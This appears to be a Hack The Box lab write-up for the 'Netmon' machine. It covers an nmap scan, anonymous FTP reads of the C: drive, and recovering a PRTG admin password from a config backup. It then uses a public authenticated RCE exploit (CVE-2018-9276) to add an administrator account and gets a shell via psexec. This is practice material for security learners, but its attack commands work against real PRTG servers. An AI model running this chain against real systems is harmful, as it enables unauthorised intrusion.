# Netmon - Easy

![Netmon](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2F7m4T3FugFE6daD3yj9oa%2Fimage.png?alt=media\&token=24c77763-109c-425f-b013-990de24e1c56)

## Introduction\@Netmon:\~$

| Name         | [Netmon](https://app.hackthebox.com/machines/Netmon) |
| ------------ | ---------------------------------------------------- |
| IP           | 10.10.10.152                                         |
| Os           | Window                                               |
| Points       | 20                                                   |
| Difficulty   | Easy                                                 |
| Creator      | [mrb3n](https://app.hackthebox.com/users/2984)       |
| Release Date | 02 March 2019                                        |

## Enumeration

### Nmap

```javascript
# Nmap 7.92 scan initiated Thu Dec 23 15:58:37 2021 as: nmap -sC -sV -oN nmap.out 10.10.10.152
Nmap scan report for netmon.htb (10.10.10.152)
Host is up (0.35s latency).
Not shown: 995 closed tcp ports (reset)
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-server-header: PRTG/18.1.37.13946
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-12-23T09:37:47
|_  start_date: 2021-12-23T09:36:30
|_clock-skew: mean: 8m49s, deviation: 0s, median: 8m49s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 23 15:59:03 2021 -- 1 IP address (1 host up) scanned in 26.48 seconds
```

`FTP` can login with `Anonymous`&#x20;

```javascript
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:sheinn101): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-02-19  11:18PM                 1024 .rnd
02-25-19  09:15PM       <DIR>          inetpub
07-16-16  08:18AM       <DIR>          PerfLogs
02-25-19  09:56PM       <DIR>          Program Files
02-02-19  11:28PM       <DIR>          Program Files (x86)
02-03-19  07:08AM       <DIR>          Users
12-23-21  05:20AM       <DIR>          Windows
226 Transfer complete.
ftp>
```

It seem like ftp root directory is `c:\`&#x20;

### Getting User.txt

```javascript
ftp> cd users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19  10:44PM       <DIR>          Administrator
12-23-21  05:13AM       <DIR>          Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  07:05AM       <DIR>          Documents
07-16-16  08:18AM       <DIR>          Downloads
07-16-16  08:18AM       <DIR>          Music
07-16-16  08:18AM       <DIR>          Pictures
12-23-21  05:18AM                   94 tester.txt
12-23-21  04:37AM                   34 user.txt
07-16-16  08:18AM       <DIR>          Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
150 Opening ASCII mode data connection.
226 Transfer complete.
34 bytes received in 0.33 secs (0.0999 kB/s)
ftp> exit
221 Goodbye.
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ cat user.txt 
f876bb779c4439a08f27e9b0404e6fb5
```

We can easily get user flag with ftp anonymous.

### Web

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2Ffr64iiufoncOgwGZ0Roi%2Fimage.png?alt=media\&token=dd960b53-c062-4019-aba8-d12f8f72a0d5)

It `PRTG Network Monitor (NETMON)` page and we should try default credential which is `prtgadmin:prtgadmin` . But it doesn't work in here. We need to search the credential in `FTP` login.

After poke around, found `PRTG Network Configuration File` in this location `\ProgramData\Paessler\PRTG Network Monitor`.

```javascript
ftp> cd "\ProgramData\Paessler\PRTG Network Monitor"
250 CWD command successful.
ftp> ls -al
200 PORT command successful.
150 Opening ASCII mode data connection.
12-15-21  07:23AM       <DIR>          Configuration Auto-Backups
12-23-21  04:36AM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
12-23-21  04:36AM       <DIR>          Logs (Web Server)
12-23-21  04:42AM       <DIR>          Monitoring Database
02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
12-23-21  05:18AM              1671248 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToDo Database
226 Transfer complete.
ftp> get "PRTG Configuration.old.bak"
```

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2F7PnvDIM37XjVOw3OpTdA%2Fimage.png?alt=media\&token=0a2320b2-5369-487b-8e03-d6172ebb017b)

```javascript
<dbpassword>
	<!-- User: prtgadmin -->
	PrTg@dmin2018
</dbpassword>
```

Let's try with this credentials in Login Page.

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FpV80TVb12dy2ukOtukUE%2Fimage.png?alt=media\&token=f8cdec32-bb18-4a7d-855c-90b5801eaee6)

But it doesn't work, if we look again password structure `PrTg@dmin2018` .It end with `2018` and the configuration file is also a backup file. So we should change that year in password. I tried it with `PrTg@dmin2019` and It was worked.

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2F77tkBrEr3iNKnRmiFdZ4%2Fimage.png?alt=media\&token=010661c0-b62e-4f4d-af9a-b6f6799794dd)

## Geting Administrator

We can see version of that page on the left bottom and now we should try to search exploit for that.

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FMJCi8AaOYiotiXkIZLwm%2Fimage.png?alt=media\&token=dde557df-430a-48ac-96b6-a1c1c95427f6)

We will use this [exploitdb](https://www.exploit-db.com/exploits/46527) bash script.

> <https://www.exploit-db.com/exploits/46527>

If we execute this bash script, you may get error like this

```javascript
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ./46527.sh 
-bash: ./46527.sh: /bin/bash^M: bad interpreter: No such file or directory
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$
```

Run the following command to fix that error.

> sed -i -e 's/\r$//' 46527.sh

```javascript
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ./46527.sh 

[+]#########################################################################[+] 
[*] Authenticated PRTG network Monitor remote code execution                [*] 
[+]#########################################################################[+] 
[*] Date: 11/03/2019                                                        [*] 
[+]#########################################################################[+] 
[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*] 
[+]#########################################################################[+] 
[*] Vendor Homepage: https://www.paessler.com/prtg                          [*] 
[*] Version: 18.2.38                                                        [*] 
[*] CVE: CVE-2018-9276                                                      [*] 
[*] Reference: https://www.codewatch.org/blog/?p=453                        [*] 
[+]#########################################################################[+] 

# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' 

[+]#########################################################################[+] 
 EXAMPLE USAGE: ./prtg-exploit.sh -u http://10.10.10.10 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1"
```

We need to get `cookie` using burp to run this script.

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2F04n5Foc2EpCDFC7YViog%2Fimage.png?alt=media\&token=105a3e4c-fb48-4a3c-be21-ad9da3e396a6)

```javascript
./46527.sh -u http://10.10.10.152 -c "_ga=GA1.2.2019227520.1640252936; _gid=GA1.2.125523594.1640252936; OCTOPUS1813713946=e0RGRUJCNzI0LTBDMzYtNDk5Q04QzIzLUY3ODVEODJFQjJDNX0%3D"
```

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FcNRh3pBKWIvgBc01VBCe%2Fimage.png?alt=media\&token=3c2f5db2-75dc-4a57-b848-9bd3ca3a39c0)

Now we created a new user with this credential `pentest:P3nT3st!`  Login with `psexec.py`

```javascript
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]                                                                                                     
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/psexec.py pentest:"P3nT3st!"@10.10.10.152                                                                 
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation                                                                                                              
                                                                                                                                                                      
[*] Requesting shares on 10.10.10.152.....                                                                                                                            
[*] Found writable share ADMIN$                                                                                                                                       
[*] Uploading file xHANHcvF.exe                                                                                                                                       
[*] Opening SVCManager on 10.10.10.152.....                                                                                                                           
[*] Creating service KSTQ on 10.10.10.152.....                                                                                                                        
[*] Starting service KSTQ.....                                                                                                                                        
[!] Press help for extra shell commands                                                                                                                               
Microsoft Windows [Version 10.0.14393]                                                                                                                                
(c) 2016 Microsoft Corporation. All rights reserved. 
                                                                                                                                                                      
C:\Windows\system32>cd c:\users\administrator\desktop                                                                                                                 
                                                                                                                                                                      
c:\Users\Administrator\Desktop>dir                                                                                                                                    
 Volume in drive C has no label.                                                                                                                                      
 Volume Serial Number is 0EF5-E5E5                                                                                                                                    
                                                                                                                                                                      
 Directory of c:\Users\Administrator\Desktop                                                                                                                          
                                                                                                                                                                      
02/02/2019  11:35 PM    <DIR>          .                                                                                                                              
t02/02/2019  11:35 PM    <DIR>          ..                                                                                                                            
yp12/23/2021  04:37 AM                34 root.txte                                                                                                                    
                1 File(s)             34 bytes                                    
ro               2 Dir(s)   6,758,518,784 bytes free     
ot                                                                                 
.c:\Users\Administrator\Desktop>type root.txt                                      
52a75d9617892bb0d16e610dbf2e8787
```

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FF8DJirSFlv1Un7WBmtvu%2Fcomplete.gif?alt=media\&token=045fd197-4004-49f4-a8ed-ee28e197008f)

> <https://app.hackthebox.com/profile/237587>

## Resources

> <https://www.exploit-db.com/exploits/46527>
>
> <https://www.codewatch.org/blog/?p=453>